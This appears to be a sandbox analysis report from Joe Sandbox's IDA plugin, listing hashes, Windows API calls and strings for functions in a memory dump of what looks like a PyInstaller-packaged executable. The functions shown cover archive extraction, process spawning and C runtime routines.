Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1511944507-239921721
Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction ID: 1ee1c571f09b7f6e81a1944ec8f45361ced6a219d31953b84bf78c8fa43bf682
Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction Fuzzy Hash: 5651A23EE48642A6F710FF35E8935AAA361BF48B84FC041B5DA0D83695DF3DE401A760

Function 00007FF73AE30F38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 08e5aa8e339564cd7a7b65546afe2f45283a9087c0a557908bbbf8b75e3d7d61
Instruction ID: 4bb4cf1a7cdab0152acf8fcff8eb998b0680c7cc3f263eb2fefff20e69c83e82
Opcode Fuzzy Hash: 08e5aa8e339564cd7a7b65546afe2f45283a9087c0a557908bbbf8b75e3d7d61
Instruction Fuzzy Hash: 6B02BE6DE8D64760FE54BB21A403679A290AF40F90FC546B8ED6E477D2DF3EE401A320

Function 00007FF73AE11710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF73AE117D9
fwrite, xrefs: 00007FF73AE118EC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF73AE118F5
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF73AE11866
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF73AE11726
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF73AE118E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF73AE11806
Failed to extract %s: failed to open target file!, xrefs: 00007FF73AE11790
malloc, xrefs: 00007FF73AE1186D
Failed to create symbolic link %s!, xrefs: 00007FF73AE11753
fseek, xrefs: 00007FF73AE1180D
fopen, xrefs: 00007FF73AE11797
fread, xrefs: 00007FF73AE118FC

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 8d543000d0a9e61aac4613412ca15ec1440084bab73dcce257313c2f9e944cd2
Instruction ID: 3a5e395ac1a3f65a2ced9ca34ba5405e01e0f62486d58330d35c4dfb4c1b96c0
Opcode Fuzzy Hash: 8d543000d0a9e61aac4613412ca15ec1440084bab73dcce257313c2f9e944cd2
Instruction Fuzzy Hash: C951CD6DF88652A2FA10BB11E8432B9E390FF45B94FC440B8DE0D076D5EF2DE644A320

Function 00007FF73AE18950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0000000100000001,00007FF73AE1414C,00007FF73AE17911,?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18990
OpenProcessToken.ADVAPI32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189A1
GetTokenInformation.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189C3
GetLastError.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189CD
GetTokenInformation.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A0A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73AE18A1C
CloseHandle.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A34
LocalFree.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A66
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF73AE18A8D
CreateDirectoryW.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A9E

Strings

S-1-3-4, xrefs: 00007FF73AE18A3F
D:(A;;FA;;;%s), xrefs: 00007FF73AE18A49

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
Instruction ID: 0f1bbbb9ed30e6181fe482f03fecf30700191c121eead04873fe4b8f5df4d535
Opcode Fuzzy Hash: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
Instruction Fuzzy Hash: 5B41C435A58A8692F750BF50E4876AAB361FF84B90F8402B1EA5E476D4DF3CE404DB10

Function 00007FF73AE11AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF73AE182B0: _fread_nolock.LIBCMT ref: 00007FF73AE1835A

_fread_nolock.LIBCMT ref: 00007FF73AE11B54

Part of subcall function 00007FF73AE12890: MessageBoxW.USER32 ref: 00007FF73AE1299B

Strings

fseek, xrefs: 00007FF73AE11B33
Failed to seek to cookie position!, xrefs: 00007FF73AE11B2C
MEI, xrefs: 00007FF73AE11AE2
Could not read full TOC!, xrefs: 00007FF73AE11C09
Error on file., xrefs: 00007FF73AE11C36
Could not allocate buffer for TOC!, xrefs: 00007FF73AE11BD6
Failed to read cookie!, xrefs: 00007FF73AE11B5F
fread, xrefs: 00007FF73AE11B66, 00007FF73AE11C10
malloc, xrefs: 00007FF73AE11BDD

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: bbe49a02ff42bb8f6069a8a0c8b844031400ba91864927a1a752276503176bfa
Instruction ID: dcd53554f04c7ced0cfb73a3e14e10f1a3fb3b51b4b4926a38923a01f1e8569f
Opcode Fuzzy Hash: bbe49a02ff42bb8f6069a8a0c8b844031400ba91864927a1a752276503176bfa
Instruction Fuzzy Hash: 0E51D379B48612A6FB18FF28D443178B3A0EF88B84B9581B9D90D43795DE3CE441D754

Function 00007FF73AE18080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF73AE13D52), ref: 00007FF73AE180CF
GetStartupInfoW.KERNEL32 ref: 00007FF73AE180EE

Part of subcall function 00007FF73AE2AA14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2AA28

Part of subcall function 00007FF73AE28630: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE28697

GetCommandLineW.KERNEL32 ref: 00007FF73AE1818E
CreateProcessW.KERNELBASE ref: 00007FF73AE181D0
WaitForSingleObject.KERNEL32 ref: 00007FF73AE181E4
GetExitCodeProcess.KERNELBASE ref: 00007FF73AE181F4

Strings

Error creating child process!, xrefs: 00007FF73AE18200
CreateProcessW, xrefs: 00007FF73AE18207

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction ID: b353aaa925fa2b7c1d338ea87f18887b928a9e248afd20497811f078d439efe2
Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction Fuzzy Hash: B3415336A4878592EA20BB64E4572AAF3A0FF94760F800779E6AD437D5DF7CD044DB10

Function 00007FF73AE11000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF73AE13EC0: GetModuleFileNameW.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE13EF1

SetDllDirectoryW.KERNEL32 ref: 00007FF73AE13BE9

Part of subcall function 00007FF73AE17B60: GetEnvironmentVariableW.KERNEL32(00007FF73AE13A1F), ref: 00007FF73AE17B9A
Part of subcall function 00007FF73AE17B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF73AE17BB7

Strings

Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF73AE13AC6
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF73AE13B60
MEI, xrefs: 00007FF73AE13B1B
Failed to convert DLL search path!, xrefs: 00007FF73AE13BD1
_MEIPASS2, xrefs: 00007FF73AE13A0B, 00007FF73AE13A74, 00007FF73AE13D22, 00007FF73AE13D2E
_PYI_ONEDIR_MODE, xrefs: 00007FF73AE13A34, 00007FF73AE13A5F

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 9174f193ed7eca1f2d69d628f40356def006f7af56e9b2c407063a7bc6871f08
Instruction ID: 943e431a9c5b621ef1a4093f844ee649da82f09259db35f1a8cf77f3ef1b1c5e
Opcode Fuzzy Hash: 9174f193ed7eca1f2d69d628f40356def006f7af56e9b2c407063a7bc6871f08
Instruction Fuzzy Hash: ADB1A129B9C6A761FA64BB21D4532BDE250BF44B84FC001F1EA4D476D6EF2CE505E720

Function 00007FF73AE11050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF73AE110F1
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF73AE110B4
1.2.13, xrefs: 00007FF73AE1107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF73AE1111F
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF73AE11249
malloc, xrefs: 00007FF73AE110F8, 00007FF73AE11126

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: 823071f863a1d59b6c76fe4c232cca6c24b562ef25e432f227cb282b45ea7afb
Instruction ID: 0205118d3dbccb6e4e1bcf42fa57f968c52e0735ccfa69d5f123079285ecb89e
Opcode Fuzzy Hash: 823071f863a1d59b6c76fe4c232cca6c24b562ef25e432f227cb282b45ea7afb
Instruction Fuzzy Hash: 1651E42AA48692A5FA20BB15E4433BAE290FF84794F8441B9DD4E477C5EF3CE505E710

Function 00007FF73AE2F1D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF73AE2F56A,?,?,-00000018,00007FF73AE2B317,?,?,?,00007FF73AE2B20E,?,?,?,00007FF73AE26452), ref: 00007FF73AE2F34C
GetProcAddress.KERNEL32(?,?,?,00007FF73AE2F56A,?,?,-00000018,00007FF73AE2B317,?,?,?,00007FF73AE2B20E,?,?,?,00007FF73AE26452), ref: 00007FF73AE2F358

Strings

ext-ms-, xrefs: 00007FF73AE2F2A9
api-ms-, xrefs: 00007FF73AE2F296

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction ID: 7b0798dd333265267a3898bbcb07aa709777b6f794a8ee7849fe4a73162787e3
Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction Fuzzy Hash: C241782AB99A06A1FA25FB169C03175A391BF49BE0FC84178DD0D47784DF3CE459A320

Function 00007FF73AE2C01C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2C449

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction ID: d93c7bd9e5d99b4063e66a736cb3231a4a9e826bffd015feb1e4f8ddc2b26c54
Opcode Fuzzy Hash: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction Fuzzy Hash: 50C1F92A98CB9AA1F660BB54D4072BEF750EFC0B80FD501B9D94E07391CE7DE845A720

Function 00007FF73AE2D520 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF73AE2D50B), ref: 00007FF73AE2D63C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF73AE2D50B), ref: 00007FF73AE2D6C7

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction ID: 30dbd524b9e1e784870a5350b66fabcf92893a990f300c4d6d663e86ec4b302f
Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction Fuzzy Hash: ED91086AE48659A5F750BFA594832BDA7A0FB40B88F9442BDDF0E53684CF3CD441D320

Function 00007FF73AE2FCEC Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF73AE2FDDC
_get_daylight.LIBCMT ref: 00007FF73AE2FDED
_get_daylight.LIBCMT ref: 00007FF73AE2FDFE
_isindst.LIBCMT ref: 00007FF73AE2FEC9

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction ID: 203dee9c60ca073e19a772662ced8eac1d99b2157f16dd7bc125bad1c875572e
Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction Fuzzy Hash: 47513876F442169AFB14FF38D9476BCA7A5AB00368F900279DD1E42AD5DF3CA412D710

Function 00007FF73AE1C07C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF73AE1C08B

Part of subcall function 00007FF73AE1C24C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73AE1C26E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF73AE1C0A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF73AE1C10E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF73AE1C161

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction ID: d4279da879b1cb1c0eb9a4e976ec7a1c6d151e86654742d28337abf8d9d6dc9d
Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
Instruction Fuzzy Hash: 93314029ECC27765FA14B764D45B3B993A1AF81744FC400F5E54E872D7DE2DA804A231

Function 00007FF73AE25700 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2572D
CreateFileW.KERNELBASE ref: 00007FF73AE2576C
CloseHandle.KERNEL32 ref: 00007FF73AE257A1

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
Instruction ID: 4f5db0490ab22610bbc4f214c6f5d6c7f40c748c216bee50138bf9169dad1ed6
Opcode Fuzzy Hash: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
Instruction Fuzzy Hash: 4F41B326D5878593F710BB209A02369A360FF95764F508378EA6C03AD1DF7CA5E09720

Function 00007FF73AE29FC0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF73AE29FBC), ref: 00007FF73AE29FD1
TerminateProcess.KERNEL32(?,?,?,00007FF73AE29FBC), ref: 00007FF73AE29FDC
ExitProcess.KERNEL32 ref: 00007FF73AE29FEB

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
